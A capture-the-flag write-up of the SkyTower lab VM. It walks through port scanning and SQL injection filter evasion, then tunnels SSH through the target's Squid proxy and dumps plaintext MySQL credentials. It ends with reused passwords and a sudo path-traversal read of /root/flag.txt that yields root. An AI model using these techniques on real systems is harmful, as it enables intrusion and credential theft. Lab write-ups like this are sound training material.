Difficulty Rating:

Intermediate

Author Description

This CTF was designed by Telspace Systems for the CTF at the ITWeb Security Summit and BSidesCPT (Cape Town). The aim is to test intermediate to advanced security enthusiasts in their ability to attack a system using a multi-faceted approach and obtain the “flag”.

You will require skills across different facets of system and application vulnerabilities, as well as an understanding of various services and how to attack them. Most of all, your logical thinking and methodical approach to penetration testing will come into play to allow you to successfully attack this system. Try different variations and approaches. You will most likely find that automated tools will not assist you.

Author: Telspace Systems

Download: VulnHub

Enumeration

nmap -v -p 1-65535 -sV -O -sT 10.0.1.114

Host Service Enumeration

</tr>
Port Service Version Detection

TCP: 80

HTTP

Apache httpd 2.2.22 ((Debian))

TCP: 3128

http-proxy

Squid http proxy 3.1.20

Web Application Analysis

The basic test below indicated the web application could be vulnerable to SQL injection.

SQLi Test

SQL Injection looked possible + DB identified as MySQL:

MySQL error

Enumeration indicated the web application was filtering the SQLi attempts and removing some characters, such as OR. This was overcome (after researching for SQLi filtering evasion) using the following:

Burp SQLi Evasion

With no direct access to SSH the above credentials could not be leveraged to gain a Shell.

HTTP Proxy SSH Connection

The following was used to gain access to the SSH server by proxying the connection through the open SQUID server on the target machine.

Setup tunnel with proxytunnel:

[root:~]# proxytunnel -p 10.0.1.114:3128 -d 127.0.0.1:22 -a 4444

SSH through the HTTP tunnel:

[root:~]# ssh john@127.0.0.1 -p 4444  "/bin/sh"
john@127.0.0.1's password:

id
uid=1000(john) gid=1000(john) groups=1000(john)

/bin/sh needed to be postfixed to the end of the SSH command, as the server appeared to kick connections upon connection.

Local Enumeration

Enumeration as the user John discovered the MySQL root credentials:

$ cat login.php
<?php

$db = new mysqli('localhost', 'root', 'root', 'SkyTech');

MySQL Credentials

The following process was used to disclosed the users credentials:

$ mysql -u root -p
Enter password: root
show databases;


\q
Database
information_schema
SkyTech
mysql
performance_schema
$ mysql -u root -p SkyTech
Enter password: root
show tables;
\q
Tables_in_SkyTech
login



mysql -u root -p SkyTech
Enter password: rootroot
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
mysql -u root -p SkyTech
Enter password: root
select * from login;
\q
id    email    password
1    john@skytech.com    hereisjohn
2    sara@skytech.com    ihatethisjob
3    william@skytech.com    senseable

Privilege Escalation - Password Reuse

Password reuse for the user sara was possible using the previously discovered credentials.

[root:~]# ssh sara@127.0.0.1 -p 4444 -t  "/bin/sh"
sara@127.0.0.1's password:
$ sudo -l
Matching Defaults entries for sara on this host:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sara may run the following commands on this host:
    (root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*

The user sara had sudo access to the binary /bin/cat, path traversal was used to cat the contents of /root/flag.txt which contained the root password.

$ sudo /bin/cat /accounts/../root/flag.txt
Congratz, have a cold one to celebrate!
root password is theskytower
$

Getting root:

With the previously discovered credentials it was possible to su - to root:

$ su -
Password:
root@SkyTower:~# id
uid=0(root) gid=0(root) groups=0(root)
root@SkyTower:~# cat flag.txt
Congratz, have a cold one to celebrate!
root password is theskytower
root@SkyTower:~#

Conclusion

I enjoyed the SQL injection filtering evasion, overall a short CTF that can easily be done in an evening.

Thanks for the VM :)